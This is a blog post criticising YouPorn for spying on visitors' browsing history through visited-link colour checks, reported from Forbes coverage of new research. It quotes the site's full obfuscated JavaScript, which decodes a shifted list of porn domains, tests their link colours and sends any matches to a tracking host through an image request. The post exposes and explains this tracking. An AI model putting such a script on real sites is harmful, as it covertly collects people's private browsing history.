How YouPorn Tries To Hide That It's Spying On Your Browsing History

from the what,-no-rot-13? dept

There's a fair bit of attention being paid to a Forbes article about some new research concerning how a bunch of websites, including YouPorn, are exploiting a simple security hole to see what other sites you've visited:

How does it work? It's based on your browser changing the color of links you've already clicked on. A script on the site exploits a Web privacy leak to quickly check and see whether your browser reveals that the links to a host of other porn sites have been assigned the color "purple," meaning you've clicked them before.

This isn't a huge surprise, but what I found most fascinating was how YouPorn sought to hide this bit of javascript by "encrypting" it. And by "encrypting" it, I mean switching letters one letter up in the alphabet. As Kashmir Hill explains:

The script on YouPorn’s site that checks a user’s history (which you can see for yourself by going to the site and checking out its html with “View Source”) looks like this:

<script type="text/javascript">
function ypol(){var k={0:"qpsoivc/dpn",1:"sfeuvcf/dpn",
2:"bevmugsjfoegjoefs/dpn",3:"ywjefpt/dpn",4:"uvcf9/dpn",
5:"yoyy/dpn",6:"nfhbqpso/dpn",7:"nfhbspujd/dpn",
8:"yibntufs/dpn",9:"bxfnqjsf/dpn",10:"sfbmjuzljoht/dpn",
11:"csb{{fst/dpn",12:"yuvcf/dpn",13:"cbohcspt2/dpn",
14:"gmjoh/dpn",15:"gsffpoft/dpn",16:"nzgsffqbztjuf/dpn",
17:"efcpobjscmph/dpn",18:"qbztfswf/dpn",19:"nbyqpso/dpn",
20:"wjefpt{/dpn",21:"bfco/ofu",22:"qpsopsbnb/dpn"};
var g=[];for(var m in k){var d=k[m];
var a="";for(var f=0;f<d.length;f++)
{a+=String.fromCharCode(d.charCodeAt(f)-1)}var h=false;
for(var j in {"http://":"","http://www.":""})
{var l=document.createElement("a");
l.href=j+a;document.getElementById("ol").appendChild(l);
var e="";if(navigator.appName.indexOf("Microsoft")!=-1){e=l.currentStyle.color}
else{e=document.defaultView.getComputedStyle(l,null).getPropertyValue("color")}
if(e=="rgb(12, 34, 56)"||e=="rgb(12,34,56)"){h=true}}if(h){g.push(m)}}
var b=(g instanceof Array)?g.join(","):"";var c=document.createElement("img");
c.src="http://ol.youporn.com/blank.gif?id="+b;document.getElementById("ol").appendChild(c)}ypol();
</script>

That list of gibberish contains the sites that YouPorn is checking to see if you’ve visited, but disguises them with a bit o’ simple cryptography. Dial back each letter by one, so “qpsoivc/dpn”, for example, becomes “pornhub.com.”

What's amazing is that anyone actually thought this was a worthwhile move. It's not that hard to "decrypt" and it's almost obvious to the naked eye because it's not too difficult to figure out how the "encryption" (and I use that word loosely) works just by noticing all the terms that end in /dpn. You'd think even a rot-13 would throw a few more people off the scent.

Filed Under: browsers, encryption, history, javascript, spying
Companies: youporn